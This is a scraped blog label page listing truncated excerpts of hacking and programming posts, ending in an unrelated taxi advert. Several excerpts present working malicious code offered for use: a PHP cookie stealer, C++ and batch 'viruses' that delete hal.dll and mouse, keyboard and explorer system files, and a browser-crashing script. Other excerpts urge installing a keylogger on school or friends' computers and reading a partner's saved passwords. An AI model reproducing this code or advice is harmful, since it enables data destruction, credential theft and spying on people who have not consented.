Hiển thị các bài đăng có nhãn Programming. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Programming. Hiển thị tất cả bài đăng
How to create cookie stealer Coding in PHP?~ get via email

How to create cookie stealer Coding in PHP?~ get via email

Here is the simple Cookie Stealer code:
Cookie stored in File:
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>$cookie = $HTTP_GET_VARS["cookie"]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable.

$steal = fopen("cookiefile.txt", "a"); This open the cookiefile in
Ethical Hackers Forum Launched- Join us

Ethical Hackers Forum Launched- Join us

Update:
The forum is deleted becoz we are not able to maintain it.

--
Hi BTS readers, We are proud to say our Ethical Hackers, programmers Forum is launched now.  Join with us now.

Our forum's page rank is 2.

Our forum is mainly concerned with two parts:
Programming(My Favorite part)
Hacking and Security(Our Favorite Part)
Programming:
If you are developer, then this section is for you. 
How to run php files using wamp server?

How to run php files using wamp server?

Let me explain today how to use the wamp server to run the PHP files.  First of all download the Latest wamp server from here:
http://www.wampserver.com/and install the server.



Step 2:
Run wamp server by this selction
start->All programs->Wamp server->Start wamp server

Now you can see the w icon in system tray.

Step 3: Create PHP file
Let us create our php file first.
Open notepad and type
Learn To create Keylogger using C++|Basic Hacking Tutorials

Learn To create Keylogger using C++|Basic Hacking Tutorials

Hi friends, the most interesting part  of the hacking is spying.  Today i am going to introduce to the C++ Spyware code.   It is going to be very fun.  You can install this spyware in your college/school  or in your friend system, and get their username and passwords.  This is very simple hacking trick when compared to phishing web page.



Disadvantage of Phishing Web page:
you have to upload
Hacking Autorun.inf virus attack|Is autorun.inf virus?

Hacking Autorun.inf virus attack|Is autorun.inf virus?


When i  studied second year(cse), my friends told that autorun.inf is virus.  I thought so.  Because my antivirus blocks autorun.inf files.   In third year when i search about autorun.inf file in net, i realize about the auto run file.

 Today i bring some files from my college system.  When i insert the pen drive in my system, there are lot of exe files.They are viruses.  I delete all of them.
How to see the remembered passwords | passwords autofill Cracked

How to see the remembered passwords | passwords autofill Cracked


I am going to teach you how to see the passwords which are shown as astersik characters(*).

What is the use?

if your friend/lover select the remember passwords option when login,then you got the chance to hack their password without much effort(no need of phishing ).


Two cases:

Case I: 
if they select remember password in mozilla popup. It is easy to see the password using this method:How
MD5 Hash Code for PHP Developers

MD5 Hash Code for PHP Developers

Hi friends, This post is especially for PHP Developers.  I hope you know about MD5.  If you  do not know,please read the following articles:
Introduction to MD5 Hash Code
MD5 Hash code creation for Java Developers

Like Java, php also have build in function named as "md5" for creating Hash code.



how to use?
Just pass the original text as argument to the md5 function.  can't understand? Just
Hack to Enable Right Click in Websites

Hack to Enable Right Click in Websites


Is your favorite website disabled the right click button? No need to worry.  you can enable the Right Click button after reading this article.

There are different tools  for disabling the javascript.   But i will introduce again my favorite and best web delveloper tool for you.  This is one of best tool for hackers.



Download it and install in mozilla
https://addons.mozilla.org/en-US/firefox/
How to to disable right click using javascript?

How to to disable right click using javascript?

I am posting this article as per the one of my user request. It is easy to disable right click in a website using javascript.

Code to disable:
oncontextmenu="alert('right click is disable');return false;"

now you may have doubt about placing this javascript code. This code should be in body as one of the attribute.

I think you can understand better if i give example.
MD5 Encryption Java Program(not Decryption)-Message Digest Algorithm

MD5 Encryption Java Program(not Decryption)-Message Digest Algorithm

MD5 is one of the famous Hash algorithm.  This algorithm is used in many websites for storing the password in encrypted form. The MD5 message-digest algorithm was developed by Ronald Rivest at MIT in 1992. This algorithm takes a input message of arbitrary length and produces a 128-bit hash value of the message.
  MD5 is one way encryption method,means only encryption no decryption(but there is
Crashing Client's Browser with Javascript

Crashing Client's Browser with Javascript

Hi this is very simple javascript code to crash the client browser. If you don't know about javascript ,visit www.w3schools.com(i learn lot of languages quickly there).

This code will reload the page again and again for infintive time and crash the browser.

How to use it?  Paste the above code in
C++ ,Batch Virus code to disable All Hard disk

C++ ,Batch Virus code to disable All Hard disk


Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.



C++ Virus Code :

#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .
Virus to Delete mouse,explore,logoff using Batch Programming

Virus to Delete mouse,explore,logoff using Batch Programming


Usually we write simple viruses in batch programming.  This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer.




@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\
C++ virus that deletes the hal.dll file in system32

C++ virus that deletes the hal.dll file in system32

Hi in this article i will give you the c++ virus code.  Don't use for any illegal purpose.  This is just for learning purpose only.

#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}Above code will find the system32 folder and
Just For Fun Javascripts in Mozilla Firefox-Edit any websites

Just For Fun Javascripts in Mozilla Firefox-Edit any websites

In my last post , i gave you three javascript for mozilla. You can edit any websites by this javascript(don't think you are editing in server, you are just editing in mozilla only). You can change the homepage name to your name. whatever you like to do.

javascript:document.body.contentEditable='true';document.designMode='on';void 0Visit any website
Paste the above code in the address bar
Hit
From Java Byte code to Java Source Code

From Java Byte code to Java Source Code

This article is especially for Java programmers.  I am going to give you tool which will decompile the byte code and give you source code.  Sounds good na?! 

The “Java Decompiler project” aims to develop tools in order to decompile and analyze Java 5 “byte code” and the later versions.



JD-Core is a library that reconstructs Java source code from one or more “.class” files. JD-Core may be

TAXI 168 ĐỒNG NAI GIÁ RẺ

TAXI 168 ĐỒNG NAI GIÁ RẺ